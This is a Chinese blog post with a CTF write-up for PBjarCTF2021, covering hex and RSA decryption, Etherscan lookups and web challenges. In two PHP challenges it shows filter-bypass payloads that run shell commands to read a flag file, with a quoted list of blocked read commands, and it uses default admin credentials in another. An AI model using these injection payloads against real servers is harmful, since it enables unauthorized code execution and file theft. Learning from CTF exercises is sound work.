<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
<script data-ad-client="ca-pub-6912066943609875" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="googleacbf0c232246c14c">
  <meta name="msvalidate.01" content="459FB2FD55046A1DECE2CCD9DDB4CDC6">
  <meta name="baidu-site-verification" content="hxB6RGtiSLTYdVdv">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/pace-js@1/themes/blue/pace-theme-minimal.css">
  <script src="//cdn.jsdelivr.net/npm/pace-js@1/pace.min.js"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('https://zhaoqi.vip').hostname,
    root: '/',
    scheme: 'Gemini',
    version: '7.7.1',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":"mac"},
    back2top: {"enable":true,"sidebar":true,"scrollpercent":false},
    bookmark: {"enable":true,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: true,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta name="description" content="PBjarCTF2021 Writeup">
<meta name="keywords" content="CTF,PBjarCTF">
<meta property="og:type" content="article">
<meta property="og:title" content="PBjarCTF2021 Writeup">
<meta property="og:url" content="https://zhaoqi.vip/posts/2720124286/index.html">
<meta property="og:site_name" content="温柔小猪">
<meta property="og:description" content="PBjarCTF2021 Writeup">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2022-05-15T12:40:15.031Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PBjarCTF2021 Writeup">
<meta name="twitter:description" content="PBjarCTF2021 Writeup">

<link rel="canonical" href="https://zhaoqi.vip/posts/2720124286/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>PBjarCTF2021 Writeup | 温柔小猪</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-117346785-1"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-117346785-1');
      }
    </script>


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?4a17ce36d5c92a5726de69f0274ef237";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  
  
    <script src="/js/cursor/love.min.js"></script>
  



  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>

  <!-- badApplePlayer -->
  
  
    <script src="//lib.baomitu.com/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://myhkw.cn/api/player/158739178355" id="myhk" key="158739178355" m="1"></script>
  
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">温柔小猪</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签<span class="badge">42</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类<span class="badge">11</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档<span class="badge">43</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/ZhaoQi99" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaoqi.vip/posts/2720124286/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Zhao Qi">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="温柔小猪">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          PBjarCTF2021 Writeup
        </h2>

        <div class="post-meta">
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-09-23 16:45:05" itemprop="dateCreated datePublished" datetime="2021-09-23T16:45:05+08:00">2021-09-23</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>
            </span>

          
            <span id="/posts/2720124286/" class="post-meta-item leancloud_visitors" data-flag-title="PBjarCTF2021 Writeup" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>6.6k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>11 分钟</span>
            </span>
            <div class="post-description">PBjarCTF2021 Writeup</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Convert"><a href="#Convert" class="headerlink" title="Convert"></a>Convert</h1><p><em>So this is supposed to be the challenge for absolute beginners. For this chall, you will get a hexadecimal number, and have to convert it to text. If you don’t know how to do this, Google is your best friend!!!</em></p>
<hr>
<p>给了一个文件<code>file.txt</code>,里面是一个16进制的数:</p>
<pre><code class="python">n = <span class="string">'666c61677b6469735f69735f615f666c346767675f68317d'</span>
<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(n),<span class="number">2</span>):
    print(chr(int(n[i:i+<span class="number">2</span>],<span class="number">16</span>)),end=<span class="string">''</span>)
</code></pre>
<p><strong>flag:</strong><code>flag{dis_is_a_fl4ggg_h1}</code></p>
<h1 id="Not-Baby"><a href="#Not-Baby" class="headerlink" title="Not_Baby"></a>Not_Baby</h1><p><em>Hmm…. What is this?</em></p>
<hr>
<pre><code class="python"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *
<span class="keyword">with</span> open(<span class="string">'flag.txt'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> g:
    flag = g.read().strip()

<span class="keyword">with</span> open(<span class="string">'nums.txt'</span>, <span class="string">'r'</span>) <span class="keyword">as</span> f:
    s = f.read().strip().split()
    a = int(s[<span class="number">0</span>])
    b = int(s[<span class="number">1</span>])
    c = int(s[<span class="number">2</span>])

e = <span class="number">65537</span>
n = a**<span class="number">3</span>+b**<span class="number">3</span><span class="number">-34</span>*c**<span class="number">3</span>
m = bytes_to_long(flag)
ct = pow(m, e, n)

print(<span class="string">"n: "</span>, n)
print(<span class="string">"e: "</span>, e)
print(<span class="string">"ct: "</span>, ct)
</code></pre>
<p>在<a href="http://factordb.com/" target="_blank" rel="noopener">factordb.com</a>上分解n,得到</p>
<pre><code class="python">n = <span class="number">2</span>^<span class="number">2</span> · <span class="number">73</span> · <span class="number">181</span> · <span class="number">11411</span> · <span class="number">235111</span> · <span class="number">6546828737292350227122068012441477</span>&lt;<span class="number">34</span>&gt; · <span class="number">61872434969046837223597248696590986360784288448775988338706090668799371</span>&lt;<span class="number">71</span>&gt;
</code></pre>
<p>继续尝试在<a href="http://factordb.com/" target="_blank" rel="noopener">factordb.com</a>上分解后两个数,发现二者均为素数</p>
<p>选择两个以上的素数相乘得到n时,公钥、私钥、加解密与一般 RSA 相同。</p>
<p><code>φ(n)=(p1−1)(p2−1)(p3−1)...</code></p>
<p><strong>exp</strong></p>
<pre><code class="python"><span class="keyword">import</span> gmpy2
<span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> long2str
n = <span class="number">57436275279999211772332390260389123467061581271245121044959385707165571981686310741298519009630482399016808156120999964</span>
e = <span class="number">65537</span>
ct = <span class="number">25287942932936198887822866306739577372124406139134641253461396979278534624726135258660588590323101498005293149770225633</span>

ls = [<span class="number">2</span>, <span class="number">2</span>, <span class="number">73</span>, <span class="number">181</span>, <span class="number">11411</span>, <span class="number">235111</span>, <span class="number">6546828737292350227122068012441477</span>, <span class="number">61872434969046837223597248696590986360784288448775988338706090668799371</span>]

phi = <span class="number">1</span>
<span class="keyword">for</span> x <span class="keyword">in</span> ls:
    phi *= (x<span class="number">-1</span>)

d = gmpy2.invert(e, phi)
x = pow(ct, d, n)
print(long2str(x))
</code></pre>
<p><strong>flag:</strong><code>flag{f4ct0ring_s0000oo00000o00_h4rd}</code></p>
<h1 id="ReallynotSecureAlgorithm"><a href="#ReallynotSecureAlgorithm" class="headerlink" title="ReallynotSecureAlgorithm"></a>ReallynotSecureAlgorithm</h1><p><em>Here’s the obligatory problem!!!</em></p>
<hr>
<p>题目给了p,q,e,c的值,直接求d解密即可</p>
<pre><code class="python"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *
<span class="keyword">with</span> open(<span class="string">'flag.txt'</span>,<span class="string">'rb'</span>) <span class="keyword">as</span> f:
    flag = f.read().strip()
e=<span class="number">65537</span>
p=getPrime(<span class="number">128</span>)
q=getPrime(<span class="number">128</span>)
n=p*q
m=bytes_to_long(flag)
ct=pow(m,e,n)

<span class="keyword">print</span> (p)
<span class="keyword">print</span> (q)
<span class="keyword">print</span> (e)
<span class="keyword">print</span> (ct)
</code></pre>
<p>代码:</p>
<pre><code class="python"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> long2str
<span class="keyword">import</span> gmpy2

p = <span class="number">194522226411154500868209046072773892801</span>
q = <span class="number">288543888189520095825105581859098503663</span>
e = <span class="number">65537</span>
c = <span class="number">2680665419605434578386620658057993903866911471752759293737529277281335077856</span>

n = p*q
phi = (p<span class="number">-1</span>) * (q<span class="number">-1</span>)
d = gmpy2.invert(e,phi)
x = pow(c,d,n)
print(long2str(x))
</code></pre>
<p><strong>flag:</strong><code>flag{n0t_to0_h4rd_rIt3_19290453}</code></p>
<h1 id="TechLead"><a href="#TechLead" class="headerlink" title="TechLead"></a><strong>TechLead</strong></h1><p><em>Infamous YouTuber, and ex-Google / ex-Facebook TechLead found a quick way to make a few million dollars of a crypto scam (as a millionare). He created the ERC-20 token Million (MM), and started promoting it on his social media platforms. The deployer address of the Million token smart contract is the personal address of TechLead, what is the highest historical Ethereum balance of his personal address? Million Token: <a href="https://coinmarketcap.com/currencies/million/" target="_blank" rel="noopener">https://coinmarketcap.com/currencies/million/</a> Flag format: flag{0.006942069420}</em></p>
<hr>
<p>访问题目中给出的链接，点击<code>Explores</code>-&gt;<code>Etherscan.io</code>,<a href="https://etherscan.io/token/0x6b4c7a5e3f0b99fcd83e9c089bddd6c7fce5c611#balances" target="_blank" rel="noopener">https://etherscan.io/token/0x6b4c7a5e3f0b99fcd83e9c089bddd6c7fce5c611</a></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/TechLead-0.png" alt="TechLead"></p>
<p>点击<code>Holders</code>,找到<code>TechLead</code>的<code>address</code>,0x5922b0bbae5182f2b70609f5dfd08f7da561f5a4</p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/TechLead-1.png" alt="TechLead"></p>
<p>访问<a href="https://etherscan.io/address/0x5922b0bbae5182f2b70609f5dfd08f7da561f5a4#analytics" target="_blank" rel="noopener">https://etherscan.io/address/0x5922b0bbae5182f2b70609f5dfd08f7da561f5a4</a>,点击<code>analytics</code></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/TechLead-2.png" alt="TechLead-2"></p>
<p><strong>flag:</strong><code>flag{1.4625790953780384}</code></p>
<h1 id="miner"><a href="#miner" class="headerlink" title="miner"></a><strong>miner</strong></h1><p><em>Block #11834380 on the Ethereum Blockchain was mined on Febuary 11th at 9:12:59 AM UTC. What is the address of the miner who validated this block?</em></p>
<hr>
<p><a href="https://etherscan.io/block/11834380" target="_blank" rel="noopener">https://etherscan.io/block/11834380</a></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/miner.png" alt="miner"></p>
<p><strong>flag:</strong><code>flag{0xd224ca0c819e8e97ba0136b3b95ceff503b79f53}</code></p>
<h1 id="readFlag1"><a href="#readFlag1" class="headerlink" title="readFlag1"></a>readFlag1</h1><p><em>The address of my new smart contract is 0xf0674CD7D1C0c616063a786E7d1434340E09BadD, the flag is inside it, and the code is published on Etherscan. Important: This smart contract is on Ropsten</em></p>
<hr>
<p><a href="https://ropsten.etherscan.io/address/0xf0674CD7D1C0c616063a786E7d1434340E09BadD#code" target="_blank" rel="noopener">https://ropsten.etherscan.io/address/0xf0674CD7D1C0c616063a786E7d1434340E09BadD</a></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/readFlag1.png" alt="readFlag1"></p>
<p><strong>flag:</strong><code>flag{etherscan_S0urc3_c0de}</code></p>
<h1 id="readFlag2"><a href="#readFlag2" class="headerlink" title="readFlag2"></a>readFlag2</h1><p><em>I have republished the previous the contract at 0x585C403bC5c7eb62BF3630c7FeF1F837603bA866, but this time no source code for you this time. Luckily, the ABI of the smart contract is the same as the previous one. Figure out how to “get()” the flag. Important: This smart contract is on Ropsten</em></p>
<hr>
<p><a href="https://ropsten.etherscan.io/address/0x585C403bC5c7eb62BF3630c7FeF1F837603bA866#internaltx" target="_blank" rel="noopener">https://ropsten.etherscan.io/address/0x585C403bC5c7eb62BF3630c7FeF1F837603bA866</a></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/readFlag2-0.png" alt="assets/readFlag2-0.png"></p>
<p>点击Internal Texs,访问第一个<code>Contract</code></p>
<p><a href="https://ropsten.etherscan.io/address/0x280e7ea40d03f36a430effd3bcaf2ffa0a62e151#code" target="_blank" rel="noopener">https://ropsten.etherscan.io/address/0x280e7ea40d03f36a430effd3bcaf2ffa0a62e151</a></p>
<p>点击<code>Read Contract</code></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/readFlag2.png" alt="readFlag2"></p>
<p><strong>flag:</strong><code>flag{web3js_plus_ABI_equalls_flag}</code></p>
<h1 id="readFlag3"><a href="#readFlag3" class="headerlink" title="readFlag3"></a>readFlag3</h1><p><em>0xe2a9e67bdA26Dd48c8312ea1FE6a7C111e5D7a7A. Important: This smart contract is on Ropsten</em></p>
<hr>
<p><a href="https://ropsten.etherscan.io/address/0xe2a9e67bdA26Dd48c8312ea1FE6a7C111e5D7a7A#code" target="_blank" rel="noopener">https://ropsten.etherscan.io/address/0xe2a9e67bdA26Dd48c8312ea1FE6a7C111e5D7a7A#code</a></p>
<p><img data-src="../../CTF/PBjarCTF2021/Misc/assets/readFlag3.png" alt="image-20210923154202557"></p>
<p><strong>flag:</strong><code>flag{s3t_by_c0nstructor}</code></p>
<h1 id="ProgrammersHateProgramming"><a href="#ProgrammersHateProgramming" class="headerlink" title="ProgrammersHateProgramming"></a>ProgrammersHateProgramming</h1><p><em>just a little different than normally. Link: <a href="http://147.182.172.217:42002/index.php" target="_blank" rel="noopener">http://147.182.172.217:42002/index.php</a></em></p>
<hr>
<pre><code class="php"><span class="meta">&lt;?php</span>
<span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">"notewrite"</span>]))
{
    $newnote = $_POST[<span class="string">"notewrite"</span>];
    $notetoadd = str_replace_first(<span class="string">"&lt;?php"</span>, <span class="string">""</span>, $newnote);
    $notetoadd = str_replace_first(<span class="string">"?&gt;"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace_first(<span class="string">"&lt;script&gt;"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace_first(<span class="string">"&lt;/script&gt;"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace_first(<span class="string">"flag"</span>, <span class="string">""</span>, $notetoadd);

    $filename = generateRandomString();
    file_put_contents(<span class="string">"$filename.php"</span>, $notetoadd);
    header(<span class="string">"location:index.php"</span>);
}
</code></pre>
<p><strong>payload</strong></p>
<pre><code class="php"><span class="meta">&lt;?php</span><span class="meta">&lt;?php</span>
 <span class="keyword">echo</span> `cat /flagflag.php`;
<span class="meta">?&gt;</span><span class="meta">?&gt;</span>
</code></pre>
<p><strong>flag:</strong><code>flag{server_side_php_xss_is_less_known_but_considering_almost_80%_of_websites_use_php_it_is_good_to_know_thank_me_later_i_dont_want_to_stop_typing_this_flagg_is_getting_long_but_i_feel_like_we&#39;re_developing_a_really_meaningful_connection}</code></p>
<h1 id="ProgrammersHateProgramming-2"><a href="#ProgrammersHateProgramming-2" class="headerlink" title="ProgrammersHateProgramming 2"></a>ProgrammersHateProgramming 2</h1><p><em>oh noes now there are more filters :(( Link: <a href="http://147.182.172.217:42007/" target="_blank" rel="noopener">http://147.182.172.217:42007/</a></em></p>
<hr>
<pre><code class="php"><span class="meta">&lt;?php</span>
<span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">"notewrite"</span>]))
{
    $newnote = $_POST[<span class="string">"notewrite"</span>];
    $notetoadd = str_replace_first(<span class="string">"&lt;?php"</span>, <span class="string">""</span>, $newnote);
    $notetoadd = str_replace_first(<span class="string">"?&gt;"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace_first(<span class="string">"&lt;?"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace_first(<span class="string">"flag"</span>, <span class="string">""</span>, $notetoadd);

    $notetoadd = str_replace(<span class="string">"fopen"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"fread"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"file_get_contents"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"fgets"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"cat"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"strings"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"less"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"more"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"head"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"tail"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"dd"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"cut"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"grep"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"tac"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"awk"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"sed"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"read"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"ls"</span>, <span class="string">""</span>, $notetoadd);
    $notetoadd = str_replace(<span class="string">"ZeroDayTea is not hot"</span>, <span class="string">""</span>, $notetoadd);

    $filename = generateRandomString();
    file_put_contents(<span class="string">"$filename.php"</span>, $notetoadd);
    header(<span class="string">"location:index.php"</span>);
}
<span class="meta">?&gt;</span>
</code></pre>
<p><strong>payload</strong></p>
<pre><code class="php"><span class="meta">&lt;?php</span><span class="meta">&lt;?</span><span class="meta">&lt;?php</span>
 <span class="keyword">echo</span> `sort /flagflag.php`;
<span class="meta">?&gt;</span><span class="meta">?&gt;</span>
</code></pre>
<p><strong>flag:</strong><code>flag{wow_that_was_a_lot_of_filters_anyways_how_about_that_meaningful_connection_i_mentioned_earlier_:)}</code></p>
<h1 id="cOrL"><a href="#cOrL" class="headerlink" title="cOrL"></a>cOrL</h1><p><em>Descriptions are hard give me a break. (Think of common usernames and passwords for admin) Link: <a href="http://147.182.172.217:42003/" target="_blank" rel="noopener">http://147.182.172.217:42003/</a></em></p>
<hr>
<p>访问题目给出的链接，是一个简单的登录表单。用<code>admin:admin</code>登录</p>
<p><img data-src="../../CTF/PBjarCTF2021/Web/assets/corl2.png" alt="cOrL"></p>
<p>使用Burp Suitel拦截请求，将HTTP请求方式修改为<code>Put</code>即可:</p>
<p><img data-src="../../CTF/PBjarCTF2021/Web/assets/corl20-flag.png" alt="image-20210923170425418"></p>
<p><strong>flag:</strong><code>flag{HTTP_r3qu35t_m3th0d5_ftw}</code></p>
<link rel="stylesheet" href="/css/spoiler.css" type="text/css"><script src="/js/spoiler.js" type="text/javascript" async></script>
    </div>

    
    
    
      
  <div class="popular-posts-header">相关文章</div>
  <ul class="popular-posts">
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="/posts/501486646/" rel="bookmark">TFCCTF2021 Writeup</a></div>
    </li>
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="/posts/3427623925/" rel="bookmark">K3RN3LCTF2021 Writeup</a></div>
    </li>
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="/posts/98571386/" rel="bookmark">L3HCTF2021-个人能力认证 Writeup</a></div>
    </li>
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="/posts/2621990551/" rel="bookmark">KillerQueenCTF2021 Writeup</a></div>
    </li>
    <li class="popular-posts-item">
      <div class="popular-posts-title"><a href="/posts/4120451577/" rel="bookmark">BuckeyeCTF2021 Writeup</a></div>
    </li>
  </ul>

        <div class="reward-container">
  <div>您的支持是我继续创作最大的动力！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="Zhao Qi 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="Zhao Qi 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>Qi Zhao
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://zhaoqi.vip/posts/2720124286/" title="PBjarCTF2021 Writeup">https://zhaoqi.vip/posts/2720124286/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

            <div class="social-item">
              <a target="_blank" class="social-link" href="https://github.com/ZhaoQi99">
                <span class="icon">
                  <i class="fa fa-github"></i>
                </span>

                <span class="label">Github</span>
              </a>
            </div>

            <div class="social-item">
              <a target="_blank" class="social-link" href="/atom.xml">
                <span class="icon">
                  <i class="fa fa-rss"></i>
                </span>

                <span class="label">RSS</span>
              </a>
            </div>
    </div>
  </div>


      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
              <a href="/tags/PBjarCTF/" rel="tag"><i class="fa fa-tag"></i> PBjarCTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/434189373/" rel="prev" title="TsukuCTF2021 Writeup">
      <i class="fa fa-chevron-left"></i> TsukuCTF2021 Writeup
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/2827311957/" rel="next" title="TamilCTF2021 Writeup">
      TamilCTF2021 Writeup <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

